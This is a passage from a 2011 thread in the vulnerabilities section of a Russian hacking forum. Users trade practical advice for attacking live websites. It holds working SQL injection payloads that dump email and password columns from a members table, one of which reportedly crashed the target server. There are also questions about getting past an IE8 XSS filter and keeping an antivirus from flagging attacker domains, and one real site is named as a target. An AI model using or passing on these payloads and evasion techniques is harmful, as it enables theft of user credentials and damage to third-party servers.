HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #17811  
Старый 08.08.2011, 15:36
nikon2k
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

хмм как нету? после второго значения лимита можно свой запрос добавить не?
 
Ответить с цитированием

  #17812  
Старый 08.08.2011, 15:41
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от nikon2k  
nikon2k said:
хмм как нету? после второго значения лимита можно свой запрос добавить не?
Можно, но он фильтруется. К примеру ф-цией intval().
 
Ответить с цитированием

  #17813  
Старый 08.08.2011, 15:43
nikon2k
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

а с char() тоже не получится?
 
Ответить с цитированием

  #17814  
Старый 08.08.2011, 15:45
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

Цитата:
Сообщение от nikon2k  
nikon2k said:
хмм как нету? после второго значения лимита можно свой запрос добавить не?
можно всё что хочешь туда добавить, но как сказали выше - там стоит фильтр. Что-то типа /\d+/ или же (int)$_GET['some_param']. А ранее проверяется на вхождение в строку кавычки.

upd.

Цитата:
Сообщение от None  
а с char() тоже не получится?
ты к нормальной("существующей") странице добавь какие-нить буквы/символы. Если отображается всё тоже самое, то там стоит фильтр.
 
Ответить с цитированием

  #17815  
Старый 08.08.2011, 15:45
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от nikon2k  
nikon2k said:
а с char() тоже не получится?
Фильтр пропускает только числа.

http://gigwarez.ru/page/12,34,45/ => 12

http://gigwarez.ru/page/12blabla/ => 12
 
Ответить с цитированием

  #17816  
Старый 08.08.2011, 21:19
ISkateL!
Новичок
Регистрация: 05.03.2007
Сообщений: 3
Провел на форуме:
66211

Репутация: 35
По умолчанию

Код:
Code:
http://site.ru/?a=10\"
1)как обойти в данном случае фильтр на сервере? Пробел не проходит (точнее не фильтр, а какая то странная ошибка c обрубанием ссылки после пробела и вывода текста: [Bad Request

Your browser sent a request that this server could not understand.

The request line contained invalid characters following the protocol string.]

Вариант замены пробела на "/" или "/**/" не проходит в chrome, что обидно Во всех остальных браузерах срабатывает.

2) как обойти xss фильтр в IE8 в данном случае?

3) как обойти в данном случае антивирус ESET Nod 32? На домены вида *.co.cc он ругается

Подскажите варианты

P.S. Также нельзя использовать ";", возможно ещё что-то.
 
Ответить с цитированием

  #17817  
Старый 09.08.2011, 00:44
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

Ситуация следующая, на ресурсе присутствует sql-иньекция.

Подскажите как вывести всю нужную информацию, а не только часть?

Пример запроса:

test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--
 
Ответить с цитированием

  #17818  
Старый 09.08.2011, 00:48
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от mix0x0  
mix0x0 said:
Ситуация следующая, на ресурсе присутствует sql-иньекция.
Подскажите как вывести
всю
нужную информацию, а не только часть?
Пример запроса
:
test.ru/test.php?id=-40+union+select+1,group_concat(0x3a,mail,pwd),3,4, 5,6,7,8,9+from+members--
Код:
Code:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
 
Ответить с цитированием

  #17819  
Старый 09.08.2011, 01:06
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

Цитата:
Сообщение от Expl0ited  
Expl0ited said:
Код:
Code:
test.ru/test.php?id=-40+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(members)where(0x00)in(@x:=concat(@x,0x3c62723e,mail,0x3a,pwd))))x),3,4,5,6,7,8,9--+
спасибо, вот только серв упал

Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.

Пробовал использовать limit, но безрезультатно
 
Ответить с цитированием

  #17820  
Старый 09.08.2011, 01:10
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от mix0x0  
mix0x0 said:
спасибо, вот только серв упал
Возможно ли вывести данные по частям? Чтобы не сильно нагружать сервер.
Пробовал использовать limit, но безрезультатно
Получаемый массив данных не должен превышать одного мегабайта, иначе тянуть только стандартными методами.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ